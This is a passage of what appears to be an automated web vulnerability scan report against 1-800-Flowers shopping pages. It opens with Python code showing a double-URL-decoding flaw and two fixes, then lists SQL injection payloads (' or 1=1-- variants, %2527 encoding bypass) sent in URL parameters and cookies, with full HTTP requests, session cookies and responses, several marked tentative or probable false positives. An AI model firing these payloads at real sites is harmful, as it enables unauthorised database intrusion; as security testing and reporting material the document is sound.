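def handle_no_second_decode(wire_segment: str) -> Tuple[bool, str]:
    """Fix 1: rely on the server's single decode and never decode again.
    %2527 stays as the literal text %27, which is harmless data."""
    once = server_decode(wire_segment)
    return is_clean(once), once


def handle_decode_then_validate(wire_segment: str) -> Tuple[bool, str]:
    """Fix 2: if a second decode is genuinely required, canonicalise first and
    validate the fully decoded form, so the filter sees what the back end sees."""
    canonical = unquote(server_decode(wire_segment))
    return is_clean(canonical), canonical


if __name__ == "__main__":
    for segment in ("rrserver", "rrserver%27", "rrserver%2527"):
        print(segment,
              "broken:", handle_validate_then_decode(segment),
              "fix1:", handle_no_second_decode(segment),
              "fix2:", handle_decode_then_validate(segment))
```

With the broken ordering the plain %27 is rejected while %2527 is accepted and reaches the back end as a quote. Either fix closes that gap: dropping the second decode leaves %27 as inert text, and validating after canonicalisation rejects it.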

Request 1

GET /rrserver%2527/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903446324&cs=%7C11309%3AThe%20Popcorn%20Factory%20Birthday&p=93260&re=Y&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:07 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 1048

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /rrserver%2527%2527/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903446324&cs=%7C11309%3AThe%20Popcorn%20Factory%20Birthday&p=93260&re=Y&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%

Response 2

HTTP/1.1 400 Bad Request
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:08 GMT
Connection: keep-alive
Content-Length: 0


1.3. http://ww30.1800flowers.com/deliverycalendarnew.do [month parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /deliverycalendarnew.do

Issue detail

The month parameter appears to be vulnerable to SQL injection attacks. The payloads 12903751%20or%201%3d1--%20 and 12903751%20or%201%3d2--%20 were each submitted in the month parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance both responses are 200 OK with the same Content-Length (29038) and both render the same April 2011 calendar; the only visible difference is the Set-Cookie: JSESSIONID header in Response 1, which is the server issuing a new session rather than a change in query results. Unless the snipped parts of the bodies differ, this is a probable false positive.

Request 1

POST /deliverycalendarnew.do?month=512903751%20or%201%3d1--%20&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000zqemLI5tFS3_cCVIEMj3gm6:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29038










<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>

       
</head>
<body >
<input type="hidden" id="prodType" name="prodType" value="FPT" />

<table class="frame" cellpadding="0" cellspacing="0">
<tr>
<td align="left" width="50%" style="padding:5px 5px 0px 5px" valign="top">
<div id="deliveryCalendar">
<h3>Select a delivery date below</h3>
<div class="calInfoTxt">Click on date below to choose the delivery date of your gift.</div>


<div class="calMonth monthAlign" id="month2">
   
   <div class="calMonthHdr"><a id="prev" tabindex="7" href="javascript:callCal('3','2011','91637L','product','10010','','FPT','deliveryDate','prev')" ><span class="calNavText"><img alt="Previous" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsleft.gif" border="0" /></span></a> April 2011 <a href="javascript:callCal('5','2011','91637L','product','10010','','FPT','deliveryDate','next');" tabindex="10"><span class="calNavText"><img alt="Next" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsright.gif" border="0"/></span></a></div>
   

   <div class="calDaysHdr"><div class="calDaysHdrtxt">sun</div> <div class="calDaysHdrtxt">mon</div> <div class="calDaysHdrtxt">tues</div> <div class="calDaysHdrtxt">wed</div> <div class="calDaysHdrtxt">thurs</div> <div class="calDaysHdrtxt">fri</div> <div class="calDaysHdrtxt">sat</div></div>
       
           <div class="calWeek">
               
               
...[SNIP]...

Request 2

POST /deliverycalendarnew.do?month=512903751%20or%201%3d2--%20&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29038










<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>

       
</head>
<body >
<input type="hidden" id="prodType" name="prodType" value="FPT" />

<table class="frame" cellpadding="0" cellspacing="0">
<tr>
<td align="left" width="50%" style="padding:5px 5px 0px 5px" valign="top">
<div id="deliveryCalendar">
<h3>Select a delivery date below</h3>
<div class="calInfoTxt">Click on date below to choose the delivery date of your gift.</div>


<div class="calMonth monthAlign" id="month2">
   
   <div class="calMonthHdr"><a id="prev" tabindex="7" href="javascript:callCal('3','2011','91637L','product','10010','','FPT','deliveryDate','prev')" ><span class="calNavText"><img alt="Previous" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsleft.gif" border="0" /></span></a> April 2011 <a href="javascript:callCal('5','2011','91637L','product','10010','','FPT','deliveryDate','next');" tabindex="10"><span class="calNavText"><img alt="Next" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsright.gif" border="0"/></span></a></div>
   

   <div class="calDaysHdr"><div class="calDaysHdrtxt">sun</div> <div class="calDaysHdrtxt">mon</div> <div class="calDaysHdrtxt">tues</div> <div class="calDaysHdrtxt">wed</div> <div class="calDaysHdrtxt">thurs</div> <div class="calDaysHdrtxt">fri</div> <div class="calDaysHdrtxt">sat</div></div>
       
           <div class="calWeek">
               
                   
                       
                       
                           <div class="calDay inactiveday" id="
...[SNIP]...

1.4. http://ww30.1800flowers.com/product.do [CMAVID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The CMAVID cookie appears to be vulnerable to SQL injection attacks. The payloads 56663729'%20or%201%3d1--%20 and 56663729'%20or%201%3d2--%20 were each submitted in the CMAVID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=7009130384324031606755556663729'%20or%201%3d1--%20; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:28:48 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38787

<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurred</title>
<link rel="canonical" href="http://www.1800flowers.com/error.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />



<link rel="stylesheet" type="text/css" href="http://media5.1800flowers.com/800f_assets/jet/website/styles/flowers/carousel_002.css"/>


<link rel="stylesheet" type="text/css" href="http://media3.1800flowers.com/800f_assets/jet/website/styles/flowers/account_v1.css"/>



<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>




<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top nav style*/.bluetabs li a {color:#FFF !important; font-weight:bold;padding-left:30px !important;padding-right:30px !important;} /* Last Nav Tab paddding*/ .bluetabs li a.tabnormal8 {padding-right:15px !important;} .bluetabs {/* Edit NAV BG Img & color */background: url(http://media1.1800flowers.com/800f_asset
...[SNIP]...

Request 2

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=7009130384324031606755556663729'%20or%201%3d2--%20; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response 2

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:28:49 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000OxINk2rPNAnwU2DMQGwt1bU:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38787

<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurred</title>
<link rel="canonical" href="http://www.1800flowers.com/error.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />



<link rel="stylesheet" type="text/css" href="http://media5.1800flowers.com/800f_assets/jet/website/styles/flowers/carousel_002.css"/>


<link rel="stylesheet" type="text/css" href="http://media3.1800flowers.com/800f_assets/jet/website/styles/flowers/account_v1.css"/>



<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>




<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top nav style*/.bluetabs li a {color:#FFF !important; font-weight:bold;padding-left:30px !important;padding-right:30px !important;} /* Last Nav Tab paddding*/ .
...[SNIP]...

1.5. http://ww30.1800flowers.com/shoppingbasket.do [brandCode cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The brandCode cookie appears to be vulnerable to SQL injection attacks. The payloads 11283013'%20or%201%3d1--%20 and 11283013'%20or%201%3d2--%20 were each submitted in the brandCode cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=100111283013'%20or%201%3d1--%20; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:40 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Wj3sXdlqqkt2mok1wAhSlIN:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 150888

<html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expires" content="1">

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

   <meta name="robots" content="noindex,nofollow"/>


<!-- shopping basket head --><style type="text/css">#fagf {background:url('/800f_assets/jet/website/images/flowers/banners/fagf_holiday10_shoppingbg.jpg') no-repeat !important; width:212px !important; padding-left: 20px !important; padding-top: 84px !important;}.FindGiftLabel {color:#fff !important} .n-chkPaypal {margin-left:490px !important;}.n-chkCartRR {display:none;}</style>
<title>Shopping Basket - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://ww30.1800flowers.com/shoppingbasket.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/redesign/jquery-ui-1.7.2.custom_chk1.css"/>


<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-
...[SNIP]...

Request 2

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=100111283013'%20or%201%3d2--%20; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:44 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 150888

<html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expires" content="1">

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

   <meta name="robots" content="noindex,nofollow"/>


<!-- shopping basket head --><style type="text/css">#fagf {background:url('/800f_assets/jet/website/images/flowers/banners/fagf_holiday10_shoppingbg.jpg') no-repeat !important; width:212px !important; padding-left: 20px !important; padding-top: 84px !important;}.FindGiftLabel {color:#fff !important} .n-chkPaypal {margin-left:490px !important;}.n-chkCartRR {display:none;}</style>
<title>Shopping Basket - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://ww30.1800flowers.com/shoppingbasket.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


